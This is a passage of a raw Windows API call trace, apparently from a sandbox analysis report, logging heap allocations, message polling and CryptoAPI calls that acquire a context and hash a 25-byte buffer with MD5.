0x9c26c8 [0162.145] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0162.145] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0162.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.146] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0162.155] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.155] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.155] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.155] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.155] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.155] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0162.155] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0162.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0162.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0162.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0162.156] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.157] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.157] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.157] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0162.157] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.157] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.157] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.157] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.157] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.157] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.157] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.157] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.157] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.158] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0162.158] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.158] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.158] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0162.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0162.158] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0162.158] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.158] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.158] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0162.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0162.159] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.159] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.159] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.159] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.159] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0162.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.159] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.159] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0162.159] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.159] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0162.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0162.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.160] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0162.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0162.160] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0162.160] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0162.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0162.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.161] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.161] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0162.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0162.161] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0162.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.162] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.162] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.162] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.162] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.162] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 